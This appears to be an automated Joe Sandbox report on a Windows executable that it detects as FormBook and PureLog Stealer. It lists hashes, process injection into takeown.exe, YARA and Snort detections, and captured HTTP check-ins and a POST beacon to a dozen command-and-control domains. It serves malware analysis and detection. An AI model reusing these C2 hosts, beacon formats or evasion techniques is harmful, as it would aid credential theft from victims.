Edit tour

Windows Analysis Report
PO0424024.exe

Overview

General Information

Sample name:	PO0424024.exe
Analysis ID:	1430828
MD5:	192be7ac2833574aafeeea8e0cd52380
SHA1:	264298e6ebda222d48c0185c1ad168c51c0dc133
SHA256:	19640f20d067c8ca1ba3e08d34ea493c05b99016c6608dbcbfdf848ca4d60452
Tags:	exe
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PO0424024.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\PO0424024.exe" MD5: 192BE7AC2833574AAFEEEA8E0CD52380)

PO0424024.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\PO0424024.exe" MD5: 192BE7AC2833574AAFEEEA8E0CD52380)

tAFcdstzdUTfkmQlByDmlLl.exe (PID: 2412 cmdline: "C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

takeown.exe (PID: 1440 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)

firefox.exe (PID: 1700 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1735920141.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1729875673.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5fc93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x492c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dd63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x44760a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x430c39:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x44760a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x430c39:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: PO0424024.exe PID: 7072	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO0424024.exe.6e70000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.PO0424024.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.PO0424024.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dd63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.PO0424024.exe.6e70000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO0424024.exe.36f9970.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.PO0424024.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.PO0424024.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cf63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16592:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.PO0424024.exe.36f9970.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	04/24/24-09:21:16.693302
SID:	2856318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PO0424024.exe	ReversingLabs: Detection: 31%
Source: PO0424024.exe	Virustotal: Detection: 30%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: PO0424024.exe

Joe Sandbox ML: detected

Source: PO0424024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO0424024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: vgSP.pdb source: PO0424024.exe
Source:	Binary string: takeown.pdbGCTL source: PO0424024.exe, 00000002.00000002.2172583060.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000003.2241898532.0000000000D8F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000000.2094344581.0000000000C0E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO0424024.exe, 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2174688748.0000000003568000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2172347160.00000000033B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: takeown.pdb source: PO0424024.exe, 00000002.00000002.2172583060.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000003.2241898532.0000000000D8F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO0424024.exe, PO0424024.exe, 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2174688748.0000000003568000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2172347160.00000000033B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vgSP.pdbSHA256B source: PO0424024.exe

Source: C:\Windows\SysWOW64\takeown.exe

Code function: 7_2_02F1BAC0 FindFirstFileW,FindNextFileW,FindClose,

7_2_02F1BAC0

Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_04CC2E0B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_04CC2E10
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_071024A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_071024A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_07101C08
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_07102495
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07102495
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then jmp 0710FA83h	0_2_0710F128
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then xor edx, edx	0_2_07101FD0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then xor edx, edx	0_2_07101FC5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_07101D78
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07101D78
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_07101D6C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07101D6C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_07101BFD
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 4x nop then pop edi	6_2_0869B583
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 4x nop then xor eax, eax	6_2_0869E7D3
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then xor eax, eax	7_2_02F09290
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then pop edi	7_2_02F11FFB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then pop edi	7_2_02F0DD18

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49744 -> 91.195.240.19:80

Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32
Source: Joe Sandbox View	IP Address: 91.195.240.123 91.195.240.123

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=J8WC84xruYdLZ+87Afe3OqqbMOMBhnRcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTXSJ8T31vhIsUx1l9uwIaTYdZUjGlsKsX5ww= HTTP/1.1Host: www.xn--yzyp76d.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?F49hs=zlo+FGSBhCkM5GVJsyQNaVbtL67WnJg88Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mLWK1UOLjaHYQ4bVPRZ9N4YEmnoiYZJFdoy8=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1Host: www.luckydomainz.shopAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=zdIBKqN9oP3plxVQyNgvYq0mMKrvq5q/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uDnI7sp5jy5UFN+aaU0u6oQX+YH9icEJ0mm4= HTTP/1.1Host: www.cd14j.usAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=4UCjKZAQgLnMxNicE9pqcHmXIZhn5ynD4ggafyrMLg7tBb5+FldYarQ4uWITApeKqaBZVuXxHE31Fdk4aV2tLvZQCfORxMIFcNC7KFHj2TQuLtYW7VfXj0w= HTTP/1.1Host: www.happymarts.topAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?F49hs=oyw/nBwJ61bGycTt7MUH34VrSoK42dIQz9F/9DQxJwbLEg40x6X3ShxK/IPLtNyuGmfUrEEfHvul1hK0yfa95YoddznUFYR7i1LwCbVe0J8wy+lXuD76n/g=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1Host: www.unchainedventure.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=p2Os9DL/ZxMFxY/q2Ap/Yp5OBLYS19DXFnG8XGpKHfd79mzMsmb8450rEHnCTj1drUgFrotC1uV7Mqyg6tK80c0eBV3oPBtu8fCz/gVC+CE8Jn7lRxODf9w= HTTP/1.1Host: www.klconstructions.netAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?F49hs=BhpYg4yoBpmopPUlJaseZ9A32WKe1CLsx7T3vymtgFCfsO9mDgtC+XcLrPQxM3XDzIUIWI4YDMWjav9FDMEzU1DT6w46OubC82AXo7xlEXtHI7IZbAZeHk0=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1Host: www.kakaobrain.usAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=NMNyNvSWAQl+XC9g7rBusjWgWNBgohatDhvK1KIHhjj0aHE/UrTu3yYXFvlKPRx40FckhBe9K4BGmhcAc+bYC4VcVVEG0KUeJFitahxkTU5y9cpDhM+xwHc= HTTP/1.1Host: www.celebration24.co.ukAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?F49hs=MObKLoLcQ3KtCADN97wn86+o0wPQork8bFr1s6JTaoDyqc40RECNe9PhrOxqi3MgZSZhgejHn8Ef7GGARJGddcFpBOofhs/CBnQlSCAqoezIccakXprB4JQ=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1Host: www.holein1sa.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=b2qFmWlReUJu6citZAtbwrrOSkIcZF9V2+9XddDidwLqjCK16JlrjYTgkvrAjFAj/kbk/ZD/H0dWxyKKd1m8GF0arunEMZ5tvTjrHaUhlNNo1MItznWZgp0= HTTP/1.1Host: www.shun-yamagata.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?F49hs=ERhh1Wv2i17OvleZDVlPuLV8FPLSNlSjgSFKCO/E5FvVDH88mB+A3XwhrFKA0T7u6+xnysJANU3lpyUswnu1e2FhmydoRAv58fVG4PjZmouhcgICZXbhSfU=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1Host: www.carsinmultan.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=mRVcZEOhq89+MGHBKj9OIc/04Av6T2wEhyk9HpRK9pO5sVzjQ2X+QIoGEwrX8lym3PQN8R/kDgsMd57+ef1OrGKEsTU4CFRzLSC8xo47mPR0FpBjSaDhnxk= HTTP/1.1Host: www.threesomeapps.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com

Source: unknown

DNS traffic detected: queries for: www.xn--yzyp76d.com

Source: unknown

HTTP traffic detected: POST /pq0o/ HTTP/1.1Host: www.luckydomainz.shopAccept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateOrigin: http://www.luckydomainz.shopContent-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.luckydomainz.shop/pq0o/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.comData Raw: 46 34 39 68 73 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 37 67 35 74 74 43 52 6a 56 47 79 7a 44 62 48 34 68 5a 45 42 31 75 76 37 4b 46 38 77 45 48 77 49 41 72 6a 4f 6b 2b 34 69 2f 49 77 6f 39 46 56 44 65 30 37 51 2b 32 7a 70 63 6c 43 64 43 4a 74 46 57 37 6f 37 75 43 42 2f 4e 46 43 53 56 35 44 77 62 31 78 53 78 4c 56 65 52 65 4d 5a 30 64 41 79 32 5a 4f 51 51 4d 46 4b 73 68 6e 69 64 4d 78 6e 66 48 4b 78 50 64 49 4f 6b 47 30 4e 74 32 2f 6c 30 59 63 2f 59 38 4e 4f 4b 6e 49 46 61 51 51 38 2f 5a 71 42 35 49 6c 6e 6d 32 2b 74 66 68 46 46 35 7a 74 59 33 31 63 35 35 52 7a 78 41 4e 4c 53 63 39 6c 5a 6c 51 3d 3d Data Ascii: F49hs=+nAeGzWYuwF/7g5ttCRjVGyzDbH4hZEB1uv7KF8wEHwIArjOk+4i/Iwo9FVDe07Q+2zpclCdCJtFW7o7uCB/NFCSV5Dwb1xSxLVeReMZ0dAy2ZOQQMFKshnidMxnfHKxPdIOkG0Nt2/l0Yc/Y8NOKnIFaQQ8/ZqB5Ilnm2+tfhFF5ztY31c55RzxANLSc9lZlQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 07:21:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 3c 74 69 74 6c 65 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 72 6b 73 6d 69 6c 65 2e 63 6f 6d 2f 61 73 73 65 74 2f 6c 70 5f 73 74 79 6c 65 2e 63 73 73 22 20 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 33 36 35 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 66 69 6c 65 2f 6d 61 69 6c 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 61 6c 74 3d 22 33 36 35 e9 82 ae e7 ae b1 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 20 31 3b 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6d 22 20 3e 3c 68 32 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 68 32 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 